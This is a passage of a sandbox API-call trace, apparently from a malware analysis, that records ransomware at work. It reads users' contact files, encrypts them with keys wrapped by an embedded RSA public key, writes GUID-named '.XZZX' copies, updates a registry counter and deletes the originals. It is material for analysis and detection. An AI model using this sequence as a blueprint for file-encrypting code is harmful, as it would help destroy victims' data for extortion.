lpDistanceToMoveHigh=0x0) returned 0x2d [0034.104] WriteFile (in: hFile=0x3c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.104] SetFilePointer (in: hFile=0x3c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x32 [0034.105] SetErrorMode (uMode=0x1) returned 0x1 [0034.105] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0034.105] OutputDebugStringW (lpOutputString="end") [0034.105] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wH\"Þ\x03`Õø\x03â", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0034.105] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0034.105] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3ea5c8) returned 1 [0034.106] CryptImportPublicKeyInfo (in: hCryptProv=0x3ea5c8, dwCertEncodingType=0x1, pInfo=0x3dd1498*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd14c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd14d0*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x3248f8) returned 1 [0034.106] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.106] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0034.106] CryptEncrypt (in: hKey=0x3248f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0034.106] CryptEncrypt (in: hKey=0x3248f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ea650*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ea650*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0034.106] WriteFile (in: hFile=0x3c8, lpBuffer=0x3ea650*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3ea650*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0034.106] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0034.107] WriteFile (in: hFile=0x3c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.107] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0034.107] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0034.107] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x3d8) returned 0x0 [0034.107] RegQueryValueExW (in: hKey=0x3d8, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0x3, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0034.107] RegCloseKey (hKey=0x3d8) returned 0x0 [0034.107] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x3d8) returned 0x0 [0034.107] RegSetValueExW (in: hKey=0x3d8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x4, cbData=0x4 | out: lpData=0x3f8dfec*=0x4) returned 0x0 [0034.107] RegCloseKey (hKey=0x3d8) returned 0x0 [0034.107] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.108] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.108] CloseHandle (hObject=0x3c8) returned 1 [0034.108] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0034.109] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0034.109] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini")) returned 1 [0034.110] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini")) returned 0 Thread: id = 96 os_tid = 0x864 [0034.143] lstrcpyA (in: lpString1=0x3f8fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.143] lstrcpyW (in: lpString1=0x3f8f460, lpString2="Aclviho ASldjfl.contact" | out: lpString1="Aclviho ASldjfl.contact") returned="Aclviho ASldjfl.contact" [0034.143] lstrcpyW (in: lpString1=0x3f8e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.143] SetErrorMode (uMode=0x1) returned 0x1 [0034.143] lstrcpyW (in: lpString1=0x3f8f860, lpString2="Aclviho ASldjfl.contact" | out: lpString1="Aclviho ASldjfl.contact") returned="Aclviho ASldjfl.contact" [0034.143] CoCreateGuid (in: pguid=0x3f8e440 | out: pguid=0x3f8e440*(Data1=0x83bde75d, Data2=0xa0c4, Data3=0x46b7, Data4=([0]=0x96, [1]=0xdc, [2]=0xec, [3]=0x68, [4]=0xda, [5]=0xdf, [6]=0xdf, [7]=0xa7))) returned 0x0 [0034.144] wsprintfW (in: param_1=0x3f8ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0034.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x3f8fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0034.144] wsprintfW (in: param_1=0x3f8e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8DFF43342C68841C83BDE75D30616864.XZZX") returned 80 [0034.144] StrStrW (lpFirst="Aclviho ASldjfl.contact", lpSrch="XZZX") returned 0x0 [0034.144] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", dwFileAttributes=0x20) returned 1 [0034.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d8 [0034.145] ReadFile (in: hFile=0x3d8, lpBuffer=0x3ddb728, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x3f8e418, lpOverlapped=0x0 | out: lpBuffer=0x3ddb728*, lpNumberOfBytesRead=0x3f8e418*=0x49a, lpOverlapped=0x0) returned 1 [0034.146] CloseHandle (hObject=0x3d8) returned 1 [0034.146] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4080000 [0034.146] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4090000 [0034.147] SetErrorMode (uMode=0x1) returned 0x1 [0034.147] lstrcpyW (in: lpString1=0x3f8e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0034.147] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea6d8) returned 1 [0034.149] CryptGenKey (in: hProv=0x3ea6d8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3248b8) returned 1 [0034.437] CryptExportKey (in: hKey=0x3248b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x3f8e41c | out: pbData=0x0*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0034.437] CryptExportKey (in: hKey=0x3248b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4090000, pdwDataLen=0x3f8e41c | out: pbData=0x4090000*, pdwDataLen=0x3f8e41c*=0x94) returned 1 [0034.437] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.438] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0034.438] CryptDestroyKey (hKey=0x3248b8) returned 1 [0034.438] CryptReleaseContext (hProv=0x3ea760, dwFlags=0x0) returned 0 [0034.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\8DFF43342C68841C83BDE75D30616864.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\8dff43342c68841c83bde75d30616864.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4 [0034.438] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ddb728*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3ddb728*, lpNumberOfBytesWritten=0x3f8e438*=0x49a, lpOverlapped=0x0) returned 1 [0034.439] SetFilePointer (in: hFile=0x3b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49a [0034.439] WriteFile (in: hFile=0x3b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.439] SetFilePointer (in: hFile=0x3b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x49f [0034.439] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f8f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3f8f860*, lpNumberOfBytesWritten=0x3f8e438*=0x2e, lpOverlapped=0x0) returned 1 [0034.439] SetFilePointer (in: hFile=0x3b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4cd [0034.439] WriteFile (in: hFile=0x3b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.439] SetFilePointer (in: hFile=0x3b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4d2 [0034.439] SetErrorMode (uMode=0x1) returned 0x1 [0034.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0034.439] OutputDebugStringW (lpOutputString="end") [0034.439] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wXe5", cchString=0x0, dwFlags=0x0, pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3f8dbf4, pcbBinary=0x3f8d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0034.439] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3f8dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8 | out: pvStructInfo=0x3f8d3dc, pcbStructInfo=0x3f8d3d8) returned 1 [0034.439] CryptAcquireContextW (in: phProv=0x3f8d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3f8d3e4*=0x3ea7e8) returned 1 [0034.440] CryptImportPublicKeyInfo (in: hCryptProv=0x3ea7e8, dwCertEncodingType=0x1, pInfo=0x3dd1568*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd1598*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd15a0*, PublicKey.cUnusedBits=0x0), phKey=0x3f8d3ec | out: phKey=0x3f8d3ec*=0x3248b8) returned 1 [0034.440] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.441] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0034.441] CryptEncrypt (in: hKey=0x3248b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x3f8d3f0*=0x80) returned 1 [0034.441] CryptEncrypt (in: hKey=0x3248b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ea870*, pdwDataLen=0x3f8d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ea870*, pdwDataLen=0x3f8d3e8*=0x80) returned 1 [0034.441] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ea870*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x3ea870*, lpNumberOfBytesWritten=0x3f8e438*=0x80, lpOverlapped=0x0) returned 1 [0034.441] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0034.441] WriteFile (in: hFile=0x3b4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x3f8e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x3f8e438*=0x5, lpOverlapped=0x0) returned 1 [0034.441] GetUserNameW (in: lpBuffer=0x3f8e1f8, pcbBuffer=0x3f8dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x3f8dfe0) returned 1 [0034.441] wsprintfW (in: param_1=0x3f8dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0034.441] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe4 | out: phkResult=0x3f8dfe4*=0x3e8) returned 0x0 [0034.442] RegQueryValueExW (in: hKey=0x3e8, lpValueName="E1010314", lpReserved=0x0, lpType=0x3f8dfd8, lpData=0x3f8dfec, lpcbData=0x3f8dfdc*=0x4 | out: lpType=0x3f8dfd8*=0x4, lpData=0x3f8dfec*=0x5, lpcbData=0x3f8dfdc*=0x4) returned 0x0 [0034.442] RegCloseKey (hKey=0x3e8) returned 0x0 [0034.442] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x3f8dfe8 | out: phkResult=0x3f8dfe8*=0x3e8) returned 0x0 [0034.442] RegSetValueExW (in: hKey=0x3e8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x3f8dfec*=0x6, cbData=0x4 | out: lpData=0x3f8dfec*=0x6) returned 0x0 [0034.442] RegCloseKey (hKey=0x3e8) returned 0x0 [0034.442] VirtualFree (lpAddress=0x4080000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.442] VirtualFree (lpAddress=0x4090000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0034.442] CloseHandle (hObject=0x3b4) returned 1 [0034.443] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0034.444] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0034.444] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact")) returned 1 [0034.444] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact")) returned 0 Thread: id = 97 os_tid = 0x250 [0034.363] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0034.363] lstrcpyW (in: lpString1=0x42cf460, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0034.363] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0034.363] SetErrorMode (uMode=0x1) returned 0x1 [0034.363] lstrcpyW (in: lpString1=0x42cf860, lpString2="Administrator.contact" | out: lpString1="Administrator.contact") returned="Administrator.contact" [0034.363] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x4645120f, Data2=0xb558, Data3=0x4682, Data4=([0]=0x9d, [1]=0xe0, [2]=0x21, [3]=0x94, [4]=0xef, [5]=0x3c, [6]=0x67, [7]=0x9e))) returned 0x0 [0034.363] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned 64 [0034.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0034.363] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\FD82D02831F226B04645120F361F0AF8.XZZX") returned 80 [0034.363] StrStrW (lpFirst="Administrator.contact", lpSrch="XZZX") returned 0x0 [0034.363] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", dwFileAttributes=0x20) returned 1 [0034.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3b4 [0034.364] ReadFile (in: hFile=0x3b4, lpBuffer=0x3e164a0, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e164a0*, lpNumberOfBytesRead=0x42ce418*=0x10b1e, lpOverlapped=0x0) returned 1 [0034.365] CloseHandle (hObject=0x3b4) returned 1 [0034.365] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0034.366] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0034.366] SetErrorMode (uMode=0x1) returned 0x1 [0034.366] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0034.366] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ea760) returned 1 [0034.368] CryptGenKey (in: hProv=0x3ea760, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324938) returned 1 [0034.705] CryptExportKey (in: hKey=0x324938, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0034.705] CryptExportKey (in: hKey=0x324938, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40f0000, pdwDataLen=0x42ce41c | out: pbData=0x40f0000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0034.705] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0034.706] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0034.706] CryptDestroyKey (hKey=0x324938) returned 1 [0034.706] CryptReleaseContext (hProv=0x3ea8f8, dwFlags=0x0) returned 0 [0034.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\FD82D02831F226B04645120F361F0AF8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\fd82d02831f226b04645120f361f0af8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e0 [0034.706] WriteFile (in: hFile=0x3e0, lpBuffer=0x3e164a0*, nNumberOfBytesToWrite=0x10b1e, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e164a0*, lpNumberOfBytesWritten=0x42ce438*=0x10b1e, lpOverlapped=0x0) returned 1 [0034.708] SetFilePointer (in: hFile=0x3e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10b1e [0034.708] WriteFile (in: hFile=0x3e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0034.708] SetFilePointer (in: hFile=0x3e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10b23 [0034.708] WriteFile (in: hFile=0x3e0, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x2a, 